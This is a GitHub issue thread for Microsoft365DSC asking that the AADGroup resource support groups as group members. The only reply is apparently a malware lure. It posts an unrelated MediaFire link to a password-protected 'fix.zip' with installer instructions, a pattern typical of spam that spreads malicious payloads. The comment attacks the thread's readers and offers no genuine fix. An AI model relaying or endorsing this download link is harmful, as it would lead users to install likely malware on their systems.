### ISSUE TITLE
AADGroup - include groups as group members

### ISSUE THREAD

**Issue by sandrola** [microsoft/Microsoft365DSC#4994]
### Description of the issue

Add the ability to control groups as member of the group. Actually only users are listed as memeber. 
To keep backward compatibility a separate attribute should be used. This avoid deleteing of groups from the member and will not drift if the new parameter is not present.

### Microsoft 365 DSC Version

V1.24.731.1

### Which workloads are affected

Azure Active Directory (Entra ID)

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
